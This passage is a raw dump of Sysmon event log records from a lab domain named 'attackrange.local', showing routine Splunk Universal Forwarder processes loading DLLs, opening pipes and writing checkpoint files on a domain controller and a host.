Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec.dll-----MD5=D98BAB348C28C8CFCC11EDB575E2557A,SHA256=ADA3F1256B175ECC390F126D2730D7A1AAB5A53F1AF205A7667D8010416602F9trueSplunk, Inc.Valid 734700x800000000000000057345305Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:07.820{8B6011A9-5B43-618E-3FF3-04000000F101}2272C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\ssleay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/ssleay32.dllMD5=B20FA07A7A61791EE537B5945429E141,SHA256=EF53BC2AB58BC548EFA249B0B8F2E1FBB9D4739EF27B0C67DFF1468D555329D3trueSplunk, Inc.Valid 734700x800000000000000057345304Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:07.820{8B6011A9-5B43-618E-3FF3-04000000F101}2272C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValid 734700x800000000000000057345303Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:07.820{8B6011A9-5B43-618E-3FF3-04000000F101}2272C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 734700x800000000000000057345302Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:07.820{8B6011A9-5B43-618E-3FF3-04000000F101}2272C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxslt.dll-----MD5=B8D3119CE62331C6A9B170DA0A608F28,SHA256=7D6C6B7C542B4E67AA468FEB12044E2EE34CE8F8A68C7665D7861F3363B6E66AtrueSplunk, Inc.Valid 734700x800000000000000057345301Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:07.820{8B6011A9-5B43-618E-3FF3-04000000F101}2272C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxml2.dll2.9.9libxml2 librarylibxml2-libxml2.dllMD5=0E7B7B3B25A2F094EB3A7BAF471154B8,SHA256=6CFAC8D8D5B7345F2C6CC82CBF8F9DD475881EA260346BE283E52B822F2CCAC1trueSplunk, Inc.Valid 734700x800000000000000057345300Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:07.820{8B6011A9-5B43-618E-3FF3-04000000F101}2272C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\activeds.dll10.0.14393.4169 (rs1_release.210107-1130)ADs Router Layer DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationADsMD5=C62947CD1080E3B128B517AE91B22D6D,SHA256=6BB5D8967F822B5B1646DC9069212914D36C4D3D65E086AC0890B6A02112B438trueMicrosoft WindowsValid 734700x800000000000000057345299Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:07.820{8B6011A9-5B43-618E-3FF3-04000000F101}2272C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\advapi32.dll10.0.14393.4467 (rs1_release.210604-1844)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=A8CDCAC5C32D14ED8AADDF5489FC5D55,SHA256=140F07A8F6780DAFE20CC4FBE86C9332FB2F0C26ED8F49914BD05265C63EF6F1trueMicrosoft WindowsValid 10341000x800000000000000057345298Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:07.820{8B6011A9-BB8B-618B-50A0-04000000F101}92124768C:\Windows\system32\conhost.exe{8B6011A9-5B43-618E-3FF3-04000000F101}2272C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000057345297Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:07.820{8B6011A9-5B43-618E-3FF3-04000000F101}2272C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=0F627827D9CFFA8E0BCF30F013FB7209,SHA256=EA47C3E471801ACA92EE449C66CF785EA670ADE92A5A2D5CDB81C93DD72ABEF0trueMicrosoft WindowsValid 734700x800000000000000057345296Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:07.820{8B6011A9-5B43-618E-3FF3-04000000F101}2272C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 734700x800000000000000057345295Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:07.820{8B6011A9-5B43-618E-3FF3-04000000F101}2272C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ntdll.dll10.0.14393.4530 (rs1_release.210705-0736)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=36B87C41EE39F3051D116F735EBEF866,SHA256=9C45BAE6D7E27B3AE04BBF88B96686C04ED6A43695558E82B687013BA0383F8AtrueMicrosoft WindowsValid 734700x800000000000000057345294Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:07.820{8B6011A9-5B43-618E-3FF3-04000000F101}2272C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241trueSplunk, Inc.Valid 10341000x800000000000000057345293Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:07.820{8B6011A9-8868-6164-0500-00000000F101}424440C:\Windows\system32\csrss.exe{8B6011A9-5B43-618E-3FF3-04000000F101}2272C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000057345292Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:07.820{8B6011A9-BB8A-618B-4CA0-04000000F101}74521152C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{8B6011A9-5B43-618E-3FF3-04000000F101}2272C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000057345291Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:07.806{8B6011A9-5B43-618E-3FF3-04000000F101}2272C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{8B6011A9-886B-6164-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241{8B6011A9-BB8A-618B-4CA0-04000000F101}7452C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 18141800x800000000000000057345290Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:17:07.805{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x800000000000000057345289Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreatePipe2021-11-12 12:17:07.805{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x800000000000000057345288Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:17:07.805{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x800000000000000057345287Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreatePipe2021-11-12 12:17:07.805{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x800000000000000057345286Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:17:07.805{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x800000000000000057345285Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreatePipe2021-11-12 12:17:07.805{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 11241100x800000000000000057345284Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:07.389{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057345283Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:07.389{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=50760F89531ECF745221D96E67492AA1,SHA256=847A4040665DDCC6244A9AC1EB3035672B18C057F5EFF7D759C03D09379E9BE9falsetrue 23542300x800000000000000021219571Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:07.634{AD5E2759-5433-6143-1200-00000000F101}292NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=070E78676806440E8E14A99E629DBC61,SHA256=598B632E49E260B673F0328633FE7CCD17357AD6EC0C3B939464BE25B8F93243,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057345282Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:07.121{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-09-16 14:18:46.122 23542300x800000000000000057345281Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:07.121{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EEB3DB775403E1B86AB79693C21D3571,SHA256=D238E5CCB2CEC53890E04AD755CFA0FF42C23874269753D57922CFB5468A8002falsetrue 23542300x800000000000000021219581Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:08.759{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E5C76CF37945493546D7952C37D8A33C,SHA256=A98BEEE757EDC8254399AA254FF310B562FB2FFB1393B285A0032EE8B07B0362,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 534500x800000000000000057345401Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:08.737{8B6011A9-5B44-618E-40F3-04000000F101}10152C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe 10341000x800000000000000057345400Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:08.737{8B6011A9-5B44-618E-40F3-04000000F101}101526556C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{8B6011A9-BB8A-618B-4CA0-04000000F101}7452C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000057345399Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:08.737{8B6011A9-5B44-618E-40F3-04000000F101}10152C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\dbgcore.dll10.0.14321.1024 (debuggers(dbg).210127-1811)Windows Core Debugging HelpersMicrosoft® Windows® Operating SystemMicrosoftDBGCORE.DLLMD5=72E8FEC8419AB470FB737883463688FE,SHA256=1DA7D2D2D1C4E6EC17101A4997C4AA610818730D63C72C1D2084ABA3F25C5146trueMicrosoft WindowsValid 734700x800000000000000057345398Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:08.737{8B6011A9-5B44-618E-40F3-04000000F101}10152C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\dbghelp.dll10.0.14321.1024 (rs1_release.160715-1616)Windows Image HelperMicrosoft® Windows® Operating SystemMicrosoftDBGHELP.DLLMD5=2C92DF5D32661FB4B81B08B72B2102A7,SHA256=BCEF4DEBDE7D8D6916EE3D3E5E63A725E03A058AABCD7DD49DF9D48B16E96D1AtrueMicrosoft WindowsValid 11241100x800000000000000057345397Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:08.605{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-09-16 14:18:46.122 23542300x800000000000000057345396Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:08.605{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1D81B4BE36B1A16554C9098540163872,SHA256=C3C2419AB2EFA49E4D70F5BC73B347FE678EF40E757CAA478BB24F6AC4EFFCFAfalsetrue 734700x800000000000000057345395Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:08.536{8B6011A9-5B44-618E-40F3-04000000F101}10152C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FEtrueMicrosoft WindowsValid 734700x800000000000000057345394Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:08.536{8B6011A9-5B44-618E-40F3-04000000F101}10152C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\rsaenh.dll10.0.14393.4467 (rs1_release.210604-1844)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=28140830C342F475A597B2D54C42DFFA,SHA256=99E23D0177C6DC59AD72DEEC46CFB995828EF567F001261BC65532B6DDEAD862trueMicrosoft WindowsValid 734700x800000000000000057345393Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:08.536{8B6011A9-5B44-618E-40F3-04000000F101}10152C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778CtrueMicrosoft WindowsValid 18141800x800000000000000057345392Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:17:08.536{8B6011A9-5B44-618E-40F3-04000000F101}10152\srvsvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe 734700x800000000000000057345391Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:08.536{8B6011A9-5B44-618E-40F3-04000000F101}10152C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\srvcli.dll10.0.14393.0 (rs1_release.160715-1616)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=656F846CAED76C6FC5C76E8BACEF4EF6,SHA256=DFDE27C086764ACC1EA3E6A4E2BA50C2AB532F9E1D99203861F51910A8D850FBtrueMicrosoft WindowsValid 18141800x800000000000000057345390Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:17:08.520{8B6011A9-5B44-618E-40F3-04000000F101}10152\wkssvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe 734700x800000000000000057345389Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:08.520{8B6011A9-5B44-618E-40F3-04000000F101}10152C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74trueMicrosoft WindowsValid 734700x800000000000000057345388Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:08.520{8B6011A9-5B44-618E-40F3-04000000F101}10152C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\wkscli.dll10.0.14393.0 (rs1_release.160715-1616)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3DCBAE237E4E1F0EBE8E7DC053F778C4,SHA256=C3331CCBE71CC98A5F1BC013F1C0218FE194CA7B497DDF706BF9025AB5A7B330trueMicrosoft WindowsValid 734700x800000000000000057345387Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:08.520{8B6011A9-5B44-618E-40F3-04000000F101}10152C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923trueMicrosoft WindowsValid 734700x800000000000000057345386Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:08.520{8B6011A9-5B44-618E-40F3-04000000F101}10152C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\netapi32.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=F55166956AEAD05A141BA7E80B90AB7B,SHA256=B9BCF21D7F7E771C388C469B2611E8946166C62005B56D72421060DABFF7093FtrueMicrosoft WindowsValid 734700x800000000000000057345385Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:08.520{8B6011A9-5B44-618E-40F3-04000000F101}10152C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValid 11241100x800000000000000057345384Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:08.520{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057345383Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:08.520{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6EAE032D56F3DD8D274628FEA6660EC1,SHA256=6A2C5187A4DB47AEB56EAF52570041A5E932F9A821DF40AA0C1C36B868EC5972falsetrue 734700x800000000000000057345382Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:08.520{8B6011A9-5B44-618E-40F3-04000000F101}10152C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\Wldap32.dll10.0.14393.3269 (rs1_release.190929-1234)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWLDAP32.DLLMD5=12D6C3E8AC705BB42D377C05714F551C,SHA256=E67F6DB96F062A319312C365F1F55B2B38B0F90B77FFDA2522418709CBA45EB3trueMicrosoft WindowsValid 734700x800000000000000057345381Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:08.520{8B6011A9-5B44-618E-40F3-04000000F101}10152C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\adsldpc.dll10.0.14393.0 (rs1_release.160715-1616)ADs LDAP Provider C DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationadsldpcMD5=F03FD7F523CFDBB96B0F3B8012FC161D,SHA256=8218E5AC2D7A52A2D50CD8D3CC8AA8CE4E37D1BDECFA62BC2637AA32A01CBA54trueMicrosoft WindowsValid 734700x800000000000000057345380Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:08.520{8B6011A9-5B44-618E-40F3-04000000F101}10152C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\vcruntime140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140.dllMD5=0C583614EB8FFB4C8C2D9E9880220F1D,SHA256=6CADB4FEF773C23B511ACC8B715A084815C6E41DD8C694BC70090A97B3B03FB9trueMicrosoft CorporationValid 734700x800000000000000057345379Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:08.520{8B6011A9-5B44-618E-40F3-04000000F101}10152C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\msvcp140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationmsvcp140.dllMD5=BA72C2F6F465926980ADC2FB7F8B3490,SHA256=86881A7054532019291C162F0A8177980C1C2B45490F7E88543F22915D08D9FFtrueMicrosoft CorporationValid 734700x800000000000000057345378Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:08.520{8B6011A9-5B44-618E-40F3-04000000F101}10152C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\archive.dll-----MD5=98978F08A7A0D24C92FE8DC5287A8258,SHA256=CBB940A38E834C0BE44884C667863F76D6700D564043F90B3EB813370C3174E7trueSplunk, Inc.Valid 734700x800000000000000057345377Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:08.520{8B6011A9-5B44-618E-40F3-04000000F101}10152C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec-openssl.dll-----MD5=F30BB43EC30BE50400780223450492CD,SHA256=867D0453E285A5C29A4EFA039D2399662DCCAC98F88C46B0A41CEFB6B68DD836trueSplunk, Inc.Valid 734700x800000000000000057345376Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:08.520{8B6011A9-5B44-618E-40F3-04000000F101}10152C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec.dll-----MD5=D98BAB348C28C8CFCC11EDB575E2557A,SHA256=ADA3F1256B175ECC390F126D2730D7A1AAB5A53F1AF205A7667D8010416602F9trueSplunk, Inc.Valid 734700x800000000000000057345375Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:08.520{8B6011A9-5B44-618E-40F3-04000000F101}10152C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\libeay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/libeay32.dllMD5=6445BD4247E3956B244772F3C415585F,SHA256=2B08FC9E160AD0F698226DA3E30A12551E8EBCCA1E7287E3915EC62B58151A78trueSplunk, Inc.Valid 734700x800000000000000057345374Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:08.504{8B6011A9-5B44-618E-40F3-04000000F101}10152C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\ssleay32.dll1.0.2tOpenSSL Shared LibraryThe 